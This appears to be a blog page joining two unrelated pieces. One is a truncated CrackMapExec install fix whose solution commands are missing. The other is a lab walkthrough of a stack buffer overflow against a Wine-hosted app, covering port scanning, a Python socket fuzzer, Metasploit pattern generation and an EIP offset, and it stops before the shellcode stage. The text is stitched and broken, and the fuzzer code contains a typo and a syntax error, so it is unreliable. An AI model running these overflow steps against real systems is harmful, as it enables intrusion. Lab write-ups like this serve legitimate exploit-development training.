Solving CrackMapExec ver 5.0.2dev installation error related to asn1crypto
Below you will find a solution to the installation issue of CrackMapExec 5.0.2dev (CME), related to past versions of asn1crypto (< 1.3.0). It occured on a Kali Linux 2020.1 VM, while following along with the instructions from Github source (link below).
error: asn1crypto>=1.3.0 is required by {‚minikerberos’}:
Installed /usr/local/lib/python3.7/dist-packages/crackmapexec-5.0.2.dev0-py3.7.egg
Processing dependencies for crackmapexec==5.0.2.dev0
error: asn1crypto 0.24.0 is installed but asn1crypto>=1.3.0 is required by {'minikerberos'}
Now as we know the cause, all we need to do is
How can we solve it?
To upgrade the asn1crypto library, ensure you’ve already installed pip3 via your system package manager:
Following is the outcome of my hacking handiwork and obtaining root. Withour further delay, let’s start the party.
nmap -sV -sT -v -p- -T4 192.168.56.1/24
custom application running in Wine on port 9999
python SimpleHTTPServer on port 10000
Nikto might be helpful at this moment
nikto -h 192.168.56.106
It tells us about the mysterious bin directory. Let’s browse the website and look inside it:
192.168.56.106:10000/bin/
A suspicious app binary is waiting there for us – maybe it’s the key for solving this puzzle?
We won’t know unless we check it out. Let’s run the strings command to view the hardcoded strings within the binary
The shitstorm line instantly draws the attention – it may be a password to a certain service! We are gonna give it a try:
It looks useless. I also used telnet but still nothing, the application responded with the following: Connection closed by foreign host.
The app behaves as if it were a kind of a server. After opening the socket it waits for connection, checks the input and then drops.
2. Some scripting & fuzzing
Preinstalled Immunity Debugger on Windows 32-bit VM may come in handy here.
In the first round we’re gonna send a long, repeated string of A’s with a simple fuzzer visible below. By running the script, the terminal will tell us whether providing sufficiently long input can crash the app:
import socket
for i in range(30):
s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
s.connect(("192.168.56.105",9999) # mind to change the IP address :-)
payloaod = int(i)*("A"*100)
s.send(payload+"\r\n")
print "[*] Sending buffer data with " + str(len(str(payload))) + " A's\r\n"
s.close()
Running the code provides us with the following output:
Turns out that the overflow occurs around the length of 900 A’s.
In Immunity we notice that the EIP has been overwritten with 41414141 (ASCII representation of four A’s). It also says that an Access violation occurs while executing the code at address 41414141.
3. Finding EIP location
As the vulnerability is known and it’s obvious that we’ve gained control over replacing the EIP address, it brings us closer to our goal.
Firstly, we need to find the offset that could control the EIP. We’re gonna utilize a Metasploit feature and create a pattern consisting of a set of unique, three-character substrings:
It spits out a unique and random set that perfectly fits to our payload.
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.56.105',9999))
payload = ("Put the pattern here")
print s.recv(1024)
s.send(payload)
print s.recv(1024)
s.close()
Execution of the script causes Access violation again and leads to crash:
As you can see above, the pattern inside the EIP is 35724134
After having the pattern located inside the instruction pointer (EIP), let’s determine the offset (known as the exact location of the address) and make it point to our malicious shellcode, which we will craft later on.
ruby pattern_offset.rb -q 35724134
Exactly 524 bytes of junk data is needed to get us to the EIP.
Now our payload will look like this: "A"*524+"B"*4+"C"*(900-524-4)
It was really confusing at first. Notice the CMD 1.4.1 label? This is because the windows executable is running through Wine on a Linux machine. Time to switch to Linux shell.
